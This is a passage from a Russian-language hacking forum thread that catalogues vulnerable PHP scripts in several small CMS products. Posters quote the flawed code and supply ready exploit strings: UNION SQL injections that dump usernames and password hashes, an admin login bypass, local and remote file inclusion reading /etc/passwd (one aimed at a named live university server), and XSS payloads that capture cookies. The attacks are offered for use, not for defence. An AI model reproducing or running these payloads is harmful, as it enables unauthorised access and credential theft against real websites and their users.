Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    faNAME
    product : en.faname

    SQL injection
    1. mq = off
    page.php - уязвимость в коде файла /class/page.php к которому обращается файл
    Code :
    PHP:
    $id $_GET['id'];
    $kind "id";
    $result mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1");
    while(
    $r=mysql_fetch_array($result))
    result :
    Code:
    http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(),3,4--+
    Blind sql
    2. admin panel
    /admin/del.page.php
    PHP:
    if($_GET["cmd"]=="delete")
    {
    $id $_GET['id'];

    $sql "DELETE FROM blog WHERE id=$id";
    $result mysql_query($sql);
    result :
    Code:
    http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql}
    Passive XSS
    mq = off
    Code:
    http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
     
    9 people like this.
  2. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Драконий Движок
    product : Драконий Движок 0.1

    RFI - LFI
    mq=off (Доступ в админ панель не нужна)
    admin/system/include.php - Code :
    PHP:
            include("$skindir/header.php");
                  ....
        include(
    "$skindir/footer.php");
    result :
    Code:
    http://localhost/admin/system/include.php?skindir=../../[FILE]%00
    Code:
    http://localhost/admin/system/include.php?skindir=http://localhost/1.txt?


    SQL Injection
    standart prefix : dre_
    mq = off
    index.php - обращение к файлу admin/system/engine.php : CODE
    PHP:
    if ($p != ""$build .= " AND aid = '$p'";
    if (
    $cat || $user) {
        if (!
    $p) {
            if (
    $cat) {$build .= " AND category = '$cat'";} 
            if (
    $user) {$build .= " AND username = '$user'";}
    result :
    Code:
    http://localhost/index.php?cat=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+
    Code:
    http://localhost/index.php?user=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+
    Code:
    http://localhost/index.php?p=2'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+
    Admin panel
    mq=off
    admin/profile.php : Code
    PHP:
    $result mysql_query("SELECT * FROM ".$prefix."profile WHERE username = '$username'"); 
    result :
    Code:
    http://localhost/admin/profile.php?action=view&username=admin'+and+0+union+all+select+concat_ws(0x3a,uid,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+dre_users--+
    admin/categories.php - Code :
    PHP:
    $result mysql_query("SELECT * FROM ".$prefix."categories WHERE cid='$cid'"); 
    result :
    Code:
    http://localhost/admin/categories.php?action=edit&cid=1'+and+0+union+all+select+1,concat_ws(0x3a,uid,username,password)+from+dre_users--+
    Ну и в конце комментирование - в текст комментария добавляем (для MySQL 5.0. ...)
    Code:
    '/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

    Passive XSS
    Code:
    http://localhost/index.php/%22%3E%3Cscript%3Ealert();%3C/script%3E
     
    #322 [x60]unu, 13 Mar 2010
    Last edited: 13 Mar 2010
    4 people like this.
  3. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    jurpopage
    product : jurpopage-0.0.6
    admin panel : /jurpopageadmin
    SQL injection
    mq=off
    index.php
    PHP:
    $query "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1";
            
    $result fn_query($conn_id,$query);
            while(
    $rows fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
        }
        
    $active_category_id $category;

        
    $query "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'";
        
    $result fn_query($conn_id,$query);
        while(
    $rows fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);

        if(isset(
    $HTTP_GET_VARS["id"])) $q_note_detail ="page_id = '$page_id' AND note_id = '$id'";
        else 
    $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1";
    ...
    $q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' ";
    result :
    Code:
    http://localhost/index.php?page_id=[sql]
    Code:
    http://localhost/index.php?page_id=1&category=[sql]
    Code:
    http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_name,user_password),4+from+master_user+limit+1,1--+
    jurpopageadmin/note.php
    mq=off
    доступ в админ панель
    PHP:
    $query "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'";
    Code:
    http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql]

    Passive XSS
    mq=off
    Code:
    http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
     
    7 people like this.
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    PHPShop CMS Free v.3.1
    http://www.phpshopcms.ru/

    Active XSS

    PHP:
    // Запись отзыва в базу
    function WriteGbook()
    {
    global 
    $LoadItems,$SysValue,$REMOTE_ADDR,$SERVER_NAME;


    // Подключаем библиотеку отправки почты
    PHPShopObj::loadClass("mail");

    if(isset(
    $_POST['send_gb']))
    {
    if(!
    preg_match("/@/",$_POST['mail_new']))//проверка почты
      
    {
      
    $_POST['mail_new']="";
      }
    if(@
    $_POST['name_new']!="" and @$_POST['otsiv_new']!="" and @$_POST['tema_new']!="")
       {
       
    $name_new=PHPShopSecurity::TotalClean($_POST['name_new'],2);
       
    $otsiv_new=PHPShopSecurity::TotalClean($_POST['otsiv_new'],2);
       
    $tema_new=PHPShopSecurity::TotalClean($_POST['tema_new'],2);
       
    $mail_new=addslashes($_POST['mail_new']);
       
    $date date("d.m.y");
    $ip=$REMOTE_ADDR;                        
    $sql="INSERT INTO ".$SysValue['base']['table_name7']."
    VALUES ('','
    $date','$name_new','$mail_new','$tema_new','$otsiv_new','','0')";
    mysql_query($sql)or @die($sql."Невозможно добавить к базе");

    $zag=$LoadItems['System']['name']." - Уведомление о добалении отзыва / ".date("d-m-y");
    $message="
    Доброго времени!
    ---------------

    С сайта "
    .$LoadItems['System']['name']." пришло уведомление о добалении отзыва 
    в гостевую книгу.

    Данные о пользователе:
    ----------------------

    Имя:                "
    .@$name_new."
    E-mail:             "
    .@$mail_new."
    Тема сообщения:     "
    .@$tema_new."
    Сообщение:          "
    .@$otsiv_new."  
    Дата:               "
    .date("d-m-y H:s a")."
    IP:                 "
    .$REMOTE_ADDR."

    ---------------

    С уважением,
    Компания "
    .$LoadItems['System']['company']."
    http://"
    .$SERVER_NAME;

    $PHPShopMail = new PHPShopMail($LoadItems['System']['adminmail2'],$mail_new,$zag,$message);


      }
    }
    }
    Code:
    Проверка email только на @
    if(!preg_match("/@/",$_POST['mail_new'])){
    }
    
    http://localhost/phpshop/gbook_forma/
    POST: mail_new
    mail_new = "><script>alert(1)</script>@<"
    

    Расшифровал index.php если кому интересно
    PHP:
    <? 
    session_start();
    error_reporting(0);
    if (
    file_exists("./cnstats/index.php"))
        include (
    "./cnstats/cnt.php");
    function 
    ParseTemplate($TemplateName)
    {
        global 
    $SysValue$_SESSION$PHP_SELF$_ENV;
        
    $file newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
            
    chr(47) . $TemplateName);
        
    $string newParser($file);
        
    $path_parts pathinfo($PHP_SELF);
        if (
    getenv("COMSPEC"))
            
    $dirSlesh "\\";
        else
            
    $dirSlesh "/";
        
    $root $path_parts['dirname'] . "/";
        if (
    $path_parts['dirname'] != $dirSlesh) {
            
    $replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
                
    "/images/""/\/favicon.ico/i" => $root "favicon.ico""/java\//i" => $root .
                
    "java/""/css\//i" => $root "css/""/phpshop\//i" => $root "phpshop/""/\/links\//i" =>
                
    $root "links/""/\/files\//i" => $root "files/""/\/opros\//i" => $root .
                
    "opros/""/\/page\//i" => $root "page/""/\/news\//i" => $root "news/""/\/gbook\//i" =>
                
    $root "gbook/""/\/search\//i" => $root "search/""/\"\/\"/i" => $root"/\/map\//i" =>
                
    $root "map/""/\/rss\//i" => $root "rss/", );
        } else {
            
    $replaces = array("/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
                
    "/images/""/java\//i" => "/java/""/css\//i" => "/css/""/phpshop\//i" =>
                
    "/phpshop/", );
        }
        
    $string preg_replace(array_keys($replaces), array_values($replaces), $string);
        echo 
    $string;
    }
    function 
    ParseTemplateReturn($TemplateName)
    {
        global 
    $SysValue$LoadItems$_SESSION;
        
    $SysValue $GLOBALS['SysValue'];
        
    $file newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] .
            
    chr(47) . $TemplateName);
        
    $dis newParser($file);
        return @
    $dis;
    }
    function 
    ConstantS($string)
    {
        return @
    preg_replace_callback("/@([[:alnum:]]+)@/""ConstantR"$string);
    }
    function 
    allowedFunctions($str)
    {
        
    $allowFunctions = array('if''else''swicth''for''foreach''phpinfo',
            
    'echo''print''print_r');
        
    $allowFunctions array_merge($allowFunctionsexplode(','$GLOBALS['SysValue']['function']['allowed']));
        
    preg_match_all('/\s*([A-Za-z0-9_]+)\s*\(/isU'$str$findedFunctions);
        
    $remElements array_diff($findedFunctions[1], $allowFunctions);
        if (
    count($remElements) > 0) {
            echo (
    '<br><br><b>В шаблоне обнаружена запрещенная функция</b><br>');
            echo (
    'Список найденных запрещенных функций:');
            echo (
    '<pre>');
            foreach (
    $remElements as $remElement) {
                echo (
    $remElement '()<br>');
            }
            echo (
    '</pre><br>');
            echo (
    'Список разрешенных функций (добавить свою функцию можно в config.ini):');
            echo (
    '<pre>');
            foreach (
    $allowFunctions as $allowFunction) {
                echo (
    $allowFunction '()<br>');
            }
            echo (
    '<br>');
            echo (
    '</pre><br>');
            return 
    false;
        } else {
            return 
    true;
        }
    }
    function 
    evalstr($str)
    {
        
    ob_start();
        if (eval(
    stripslashes($str[2])) !== null) {
            echo (
    '<center style="color:red"><br><br><b>PHPShop Template Code: В шаблоне обнаружена ошибка выполнения php</b><br>');
            echo (
    'Код содержащий ошибки:');
            echo (
    '<pre>');
            echo (
    $str[2]);
            echo (
    '</pre></center>');
            return 
    ob_get_clean();
        }
        return 
    ob_get_clean();
    }
    function 
    newParser($string)
    {
        global 
    $SysValue;
        
    $newstring = @preg_replace_callback("/(@php)(.*)(php@)/sU""evalstr"$string);
        
    $newstring = @preg_replace("/@([[:alnum:]]+)@/e"'$SysValue["other"]["\1"]'$newstring);
        return 
    $newstring;
    }
    function 
    ConstantR($array)
    {
        global 
    $SysValue;
        if (!empty(
    $SysValue['other'][$array[1]]))
            
    $string $SysValue['other'][$array[1]];
        else
            
    $string null;
        return 
    $string;
    }
    function 
    newGetFile($path)
    {
        
    $file = @file_get_contents($path);
        if (!
    $file)
            return 
    false;
        return 
    $file;
    }
    $time explode(' 'microtime());
    $start_time $time[1] + $time[0];
    include (
    "./phpshop/class/base.class.php");
    $PHPShopBase = new PHPShopBase("./phpshop/inc/config.ini");
    $RegTo['RegisteredTo'] = "PHPShop CMS Free";
    $RegTo['CopyrightEnabled'] = "Yes";
    $RegTo['DomenLocked'] = "No";
    $RegTo['CopyrightColor'] = "6A7EA1";
    $RegTo['SupportExpires'] = "0";
    include (
    $SysValue['file']['error']);
    if (empty(
    $GLOBALS['p']))
        
    $GLOBALS['p'] = 1;
    if (
    $SysValue['my']['gzip'] == "true")
        include (
    $SysValue['file']['gzip']);
    include (
    $SysValue['class']['obj']);
    include (
    $SysValue['class']['array']);
    include (
    $SysValue['class']['category']);
    include (
    $SysValue['class']['system']);
    include (
    $SysValue['class']['page']);
    include (
    $SysValue['class']['photo']);
    include (
    $SysValue['class']['nav']);
    include (
    $SysValue['class']['security']);
    $PHPShopSystem = new PHPShopSystem();
    $LoadItems['System'] = $PHPShopSystem->getArray();
    $PHPShopNav = new PHPShopNav();
    include (
    $SysValue['file']['engine']);
    include (
    $SysValue['file']['catalog']);
    include (
    $SysValue['file']['news']);
    include (
    $SysValue['file']['subnews']);
    include (
    $SysValue['file']['baner']);
    include (
    $SysValue['file']['cache']);
    include (
    $SysValue['file']['opros']);
    if (
    $LoadItems['System']['spec_num'] == 1) {
        if (isset(
    $_REQUEST['skin'])) {
            if (
    file_exists("phpshop/templates/" $_REQUEST['skin'] . "/index.html")) {
                
    $skin $_REQUEST['skin'];
                
    session_register('skin');
            }
        } elseif (empty(
    $_SESSION['skin'])) {
            
    $skin $LoadItems['System']['skin'];
            
    session_register('skin');
        }
        
    $SysValue['other']['skinSelect'] = Skin_select($_SESSION['skin']);
    } else {
        
    $skin $LoadItems['System']['skin'];
        
    session_register('skin');
    }
    $LoadItems CacheReturn();
    foreach (@
    $SysValue['autoload'] as $val)
        if (
    file_exists($val))
            include_once (
    $val);
    function 
    GetFileInstall()
    {
        global 
    $SysValue;
        
    $filename "./install/";
        if (
    is_dir($filename))
            exit(
    PHPSHOP_error(105$SysValue['my']['error_tracer']));
    }
    if (!
    getenv("COMSPEC"))
        
    $GetFileInstall GetFileInstall();
    if ((isset(
    $_GET['nav'])) && ($_GET['nav'] == "page")) {
        
    $Check_page_skin Check_page_skin($_GET['name']);
        if (
    $Check_page_skin != "") {
            
    $skin $Check_page_skin;
            
    session_register('skin');
        } elseif (
    $LoadItems['System']['spec_num'] != 1) {
            
    $skin $LoadItems['System']['skin'];
            
    session_register('skin');
        }
    }
    if (isset(
    $_POST['skin']))
        
    header("Location: " htmlspecialchars($REQUEST_URI));
    include (
    $SysValue['file']['meta']);
    $SysValue['other']['ProductName'] = $SysValue['license']['product_name'];
    include (
    $SysValue['file']['autoload']);
    $time explode(' 'microtime());
    $seconds = ($time[1] + $time[0] - $start_time);
    $seconds substr($seconds06);
    echo 
    "<!-- StNF " $SysValue['sql']['num'] . " ~ $seconds -->";
    if (
    $SysValue['my']['gzip'] == "true")
        
    GzDocOut($SysValue['my']['gzip_level'], $SysValue['my']['gzip_debug']); ?>
     
    #324 Seravin, 15 Mar 2010
    Last edited: 15 Mar 2010
    3 people like this.
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    product : jurpopage-0.0.6 Дополнение постов [x60]unu...
    SQL inj
    html.php
    mg=off
    PHP:
    ...
    if(empty(
    $id)) $id=1;

    $web = new speed_template($template_path);
    $web->register($template_name);

    $query "
    SELECT *
    FROM webpg 
    WHERE webpg_id='
    $id'
    "
    ;
    ...
    Result:
    http://localhost/jurp/html.php?id=[sql]
    http://localhost/jurp/html.php?id=3'+union+select+1,2,3--+

    SQL inj
    Файл login.php
    POST + капча
    mg=off
    В скрипте 2 запроса.
    Многострочный коментарий надо во второй запрос втулить чтоб обойти авторизацию, но так как там upper(), то не получаеться, вот. Но самое интересное что -- принимает.
    В поле с USER ID такую строку
    и имеею иньекцию в первом запросе. Обязательны все 3 поля.

    PHP:
        ...$conn_id connect();
            
    //--- check apakah ada nama user tersebut
            //master user
            
    $query "
            SELECT 
                count(*) as user_exist 
            FROM 
                master_user 
            WHERE 
                upper(user_id) = upper('
    $send_user')
            "
    ;
            
    $result fn_query($conn_id,$query);
            
    $mRet =fn_fetch_row($result);
            if (
    $mRet[0]>0) {
                
    //proses
                
    while($rows fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
                
    $password md5($password);
                
    $query "
                SELECT 
                    #user_id as temp_value, user_level as temp_level
                    user_id as temp_value, user_level as temp_level, 
                    master_user_id as temp_rowid
                FROM 
                    master_user 
                WHERE 
                    upper(user_id) = upper('
    $send_user') and 
                    user_password = '
    $password'
                "
    ;...
    вывод ошибок от СУБД есть, файл fungsi.php
    PHP:
    ...function fn_query($conn$input)
    {
      
    //$result =pg_query($input,$conn);
      
    $result =@mysql_query($input,$conn);
      if (!
    $result)
      {
        die (
    "Error eksekusi:<br>".mysql_error());
        return 
    false;
      }
      return 
    $result;...
     
    #325 Strilo4ka, 17 Mar 2010
    Last edited: 17 Mar 2010
    3 people like this.
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Дополнение постов [x60]unu...
    iGaming CMS
    Product : iGaming CMS
    version : 1.5
    site : forums.igamingcms.com

    SQL inj
    Файл screenshots.php
    mg=off
    PHP:
    ...if (isset($_REQUEST[id])) {

       
    $result $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
       echo 
    $start_table '<b>',stripslashes($result->fields['title']),'</b>' $end_table '<br />';
       echo 
    '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>';

       }...
    Result:
    http://localhost/gami/screenshots.php?id=1[sql]
    http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+

    SQL inj
    reviews.php
    mg=off
    PHP:
    ... if (isset($_REQUEST['browse'])) {
          
    $sql $db->Execute("SELECT id,title,section FROM `sp_reviews`
          WHERE `title` LIKE '"
    .$_REQUEST['browse']."%'
          ORDER BY `title`"
    );...
    Result:
    http://localhost/gami/reviews.php?browse=Z[sql]
    http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/*

    SQL ing
    search.php
    mg=off
    PHP:
    ... if ($_REQUEST['platform'] != 'all') {
             
    $platform "`section` = '" $_REQUEST['platform'] . "' ";
             } else {
             
    $platform "`section` LIKE '%' ";
             }
          if (
    $_REQUEST['exact'] == '1') {
             
    $title "`title` = '".$_REQUEST['keywords']."' ";
             } else {
             
    $title "`title` LIKE '%".$_REQUEST['keywords']."%' ";
             }
          
    $result $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`");
          while (
    $row $result->FetchNextObject()) {...
    Result:
    Посылаем пост или гет запрос.
    $_REQUEST['keywords'][sql] или на другую переменную...
    поле Keywords пишем - %' union select 1,version(),3,4,5/*

    Blind sql
    poll_vote.php
    PHP:
    $result $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'");

        
    $ip $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" $result->fields['poll_id'] . "' AND ip = '" $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg());
        if (
    $ip->RecordCount() < 1)
        {
        
    $count2 $result->fields['count'] + 1;
        
    $db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'");
        
    $db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" $result->fields['poll_id'] . "','" $_SERVER['REMOTE_ADDR'] . "');");
        }
    если чесно даже ковырять впадляк !!! много дыр... :)
     
    #326 Strilo4ka, 17 Mar 2010
    Last edited: 17 Mar 2010
    2 people like this.
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Jupiter 1.1.5
    http://www.jupiterportal.org
    passive xss
    было скачано с http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132
    PHP:
    ...error_reporting (E_ALL);
    $PHP_SELF $_SERVER['PHP_SELF'];...
    PHP:
    ...<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> &raquo; <?= $language['Bans desc4'?></a></td></tr>...
    PHP:
    ...if(!isset($is_loged_in))
        {
            ?>
                <tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'?></td></tr><tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr>
                <tr><td class='con1' height='96%' valign='top'>
                <form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>...
    PHP:
    ...<table width='100%' cellspacing='1' border='0' cellpadding='2'>
                <tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> &raquo; <?= $language['Maintance desc6'?></a></td>
                <td class='con1' width='5%'>&nbsp;</td>...
    PHP:
    ...if(file_exists("$n.php"))
        {
            if(
    strpos($n"../") !== falseheader("location: $PHP_SELF?i=error");
            else include(
    "$n.php");
        }
        elseif(!
    file_exists("$n.php")) header("location: $PHP_SELF?i=error");...
    Result:
    http://localhost/jupiter/index.php[XSS]

    passive xss
    modules/block.php
    PHP:
    ...if(!isset($is_webmaster))
    header("location: $PHP_SELF?i=2"); exit; }...
    Result:http://localhost/jupiter/modules/blocks.php[XSS]
    http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E
    В скриптах есть еще много XSS=/
     
    #327 Strilo4ka, 18 Mar 2010
    Last edited: 18 Mar 2010
    2 people like this.
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    LightNEasy
    site:http://www.lightneasy.org/index.php

    magic_quotes_gps = off
    Вход с полномочиями admin
    Единственное, что я придумал:
    login: "+union+select+1,2,'40bd001563085fc35165329ea1ff5c5ecbdbbeef',5,5,6,7,8,9,10,11+--+
    pass: 123
    40bd001563085fc35165329ea1ff5c5ecbdbbeef - sha-1("123")

    Уязвимый код(common.php):
    PHP:
            $result=dbquery('SELECT * FROM '.$prefix.'users WHERE handle="'.$_POST['handle'].'"');
            if(
    $row fetch_array($result)) {                    
                if(
    $row['password'] == sha1($_POST['password'])) {             
                    
    //inserts password in cookie
                    
    setcookie('userpass'sha1(trim($_POST['password'])), time() + 60 60 24 30);
                    
    setcookie('userhandle'$_POST['handle'], time() + 60 60 24 30);
                    
    $_SESSION[$set['password']]="1";
                    
    $_SESSION['user']=$row['handle'];
                    
    $_SESSION['adminlevel']=$row['adminlevel'];
                    
    $message=$langmessage[95];
                    unset(
    $_GET['do']);
                    
    header("Location: ".$set['homepath']);
                } else
                    
    $message=$langmessage[96];
            } else
                
    $message=$langmessage[96];
    Activexss

    http://localhost/light/LightNEasy.php?page=news

    Code:
    commentmessage=<script>alert(document.cookie)</script>
    
    Уязвимый код(common.php)
    PHP:
                $_POST['commentmessage'] = str_replace($order"<br />"$_POST['commentmessage']);
                
    $query="INSERT INTO ".$prefix."comments (newsid, poster, postermail, time, text) VALUES (".$_POST['newsid'].",\" ".encode($_POST['commentname'])."\", \"".encode($_POST['commentemail'])."\", ".time().", \"".encode(stripslashes($_POST['commentmessage']))."\")";
                
    dbquery($query);
     
    #328 Seravin, 18 Mar 2010
    Last edited: 18 Mar 2010
    5 people like this.
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Дополнение к https://forum.antichat.ru/showpost.php?p=1991535&postcount=343

    ---------------------------------------

    SQL injection(требования: mq=off,rq=on)

    №1

    file: modules/users.php

    PHP:
    case 1:

    ....

            
    $user $db->getLine("SELECT * FROM users",$d);
            if(!
    $userheader("location: $PHP_SELF?i=error");

    ....
    file: includes/functions_db.php

    PHP:
    function getLine($query,$id=FALSE)
        {
            if(
    $id===FALSE)
                
    $this->query($query);
            else
                
    $this->query($query." WHERE `id`='$id'");
            if(
    is_resource($this->sqlr))
            {
                
    $line=mysql_fetch_assoc($this->sqlr);
                
    $this->freeResult();
                return 
    $line;
            }
            return 
    FALSE;
        }
    result:

    Code:
    /index.php?n=modules/users&a=1&d=-1'+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+where+id=1+--+
    №2

    file: modules/forum.php

    PHP:
    case 1:

    ...

            
    $forum_cat $db->getLine("SELECT id, name FROM forum_cat",$d);
            if(!
    $forum_catheader("location: $PHP_SELF?i=error");

    ...
    file: includes/functions_db.php

    PHP:
    function getLine($query,$id=FALSE)
        {
            if(
    $id===FALSE)
                
    $this->query($query);
            else
                
    $this->query($query." WHERE `id`='$id'");
            if(
    is_resource($this->sqlr))
            {
                
    $line=mysql_fetch_assoc($this->sqlr);
                
    $this->freeResult();
                return 
    $line;
            }
            return 
    FALSE;
        }
    result:

    Code:
    /index.php?n=modules/forum&a=1&d=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+
    //инъекции с использованием бажной функции getLine
    №3

    /index.php?n=modules/forum&a=3&d=1&o=1&q=-1'+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+where+id=1+--+

    №4

    /index.php?n=modules/forum&a=5&d=1&o=1&q=1&p=0&k=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+

    №5

    /index.php?n=modules/pm&a=3&d=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users+where+id=1+--+&s=r_date&t=DESC&p=1

    ...
     
    7 people like this.
  10. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Product: Acute Control Panel
    Version: 1.1.1
    Author: http://acutecp.rediscussed.com/

    Автор выложил на опенсурсецмс.орг, наткнулся, и посмотрел :)

    SQL-Inj

    Need: mq = off

    File: acute-cp/login.php

    PHP:
    $username strtolower($_POST['username']);
    $password strtolower($_POST['password']);

    if (!empty(
    $username) || !empty($password)){

       
    $query mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'"$conn) or die(mysql_error());
       
       
    $row mysql_fetch_array($query); 
       
       ....
    if(
    mysql_numrows($query)== 1){
       
    $_SESSION['username']=$row['username'];
       
    $_SESSION['email']=$row['email'];
       
    $_SESSION['fullname']=$row['fullname'];
       
    $_SESSION['permissions']=$row['permissions'];
    Target: {POST} ?login=-1'+union+select+1,2,3,4,5,6+--+&password=1[/COLOR
    or ByPass:{POST} ?login=-22' or 1=1+--+&password=1

    После установки сессий, есть возможность проводить инъекции практически во все файлы.Например можно сделать локальный инклуд:

    File: acute-cp/options.php

    PHP:
    $so_theme                     $_POST['so_theme'];
    ....
    $so_edit_settings $_POST['Update'];

    if(isset(
    $so_edit_settings)){
    $result mysql_query("UPDATE `settings` SET `website_option`='$so_theme' WHERE website_setting='theme'")or die(mysql_error());
    ...
    File: web_settings.php

    PHP:
    $result         mysql_query("SELECT `website_option` FROM `settings` WHERE website_setting='theme'",$conn) or die(mysql_error());
    $theme_name_result     mysql_fetch_row($result);
    $theme_name         $theme_name_result['0'];
    //$theme_directory     = "themes/".$theme_name; //old code that was exploited
    If(strpos($_SERVER['SCRIPT_FILENAME'],"acute-cp")){ //is in sub folder, such as admin
    define("theme_directory","../themes/".$theme_name);
    }else{
    define("theme_directory","themes/".$theme_name);
    }
    File: index.php

    PHP:
    <?php include_once("web_settings.php"); ?>
    <?php 
    include_once(theme_directory."/header.php"); ?>
    Target: {POST} acute-cp/options.php?so_theme=../../../../../../../etc/passwd%00

    Enter: http://target/index.php
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    STACK

    System for Teaching and Assessment using a Computer algebra Kernel

    The STACK system is a computer aided assessment package for mathematics.

    LFI example:
    Code:
    http://vesna.fmf.uni-lj.si/stack/documentation.php?action=/../../../../../../../etc/passwd%00&expand=13
    
    HOME PAGE:
    Code:
    http://sourceforge.net/projects/stack/
    
    Vulnerable: Stack 1.1
     
    5 people like this.
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Продукт ChakraWeb!
    Скачал отсюдо
    SQL inj
    mg не имеет значения!
    /phpmod/news.php
    Для рядового польз.:
    PHP:
    ...case 'detail':
        
    NewsShowDetail();
        break;...
    PHP:
    ...function NewsShowDetail()
    {
        
    $news_id RequestGetValue('id'0);
        
    $sql "select news_title, news_desc, news_content from news where news_id=$news_id";
        
    $rs DbExecute($sql);
        if (
    $rs && !$rs->EOF)...
    /_files/library/fun_utils.php
    PHP:
    ...
    function 
    RequestGetValue($var_name$default=false$clean=CLEAN_NO)
    {
        global 
    $PhpMagicQuote;

        if (isset(
    $_REQUEST[$var_name]))
        {
            
    $out $_REQUEST[$var_name];

            if (
    is_string($out))
            {
                if (
    $PhpMagicQuote)
                    
    $out stripslashes($out);
                
    $out trim($out);
            }

            if (
    $clean == CLEAN_SAVE)
                
    $out =     HtmlClean($out);
            else if (
    $clean == CLEAN_ALL)
                
    $out =     HtmlCleanAll($out);
        }
        else
            
    $out $default;

        return 
    $out;
    }...
    Result:
    http://chakra/phpmod/news.php?op=detail&id=1[SQL]&cat=3
    http://chakra/phpmod/news.php?op=detail&id=-1+union+select+concat_ws%280x3a,m_name,m_password%29,2,3+from+sysmember+limit+1,1--+&cat=3


    /files/library/fun_web.php function InitSystemVars()

    PHP:
    ...
        
    $gFolderId RequestGetValue('cat'0);
        if (
    $gFolderId == 0)...

    function NewsShowPage
    PHP:
    ... $gPageId 0;


        
    DBGetFolderData($gFolderId);

        
    $gWebPage['page_sidebar']   = RenderPageSidebar()...
    /_files/library/fun_web.php
    PHP:
    ...function DBGetFolderData($folder_id)
    {
        global 
    $gCurrentUrlPath;
        global 
    $gFolder;
        global 
    $db;
        global 
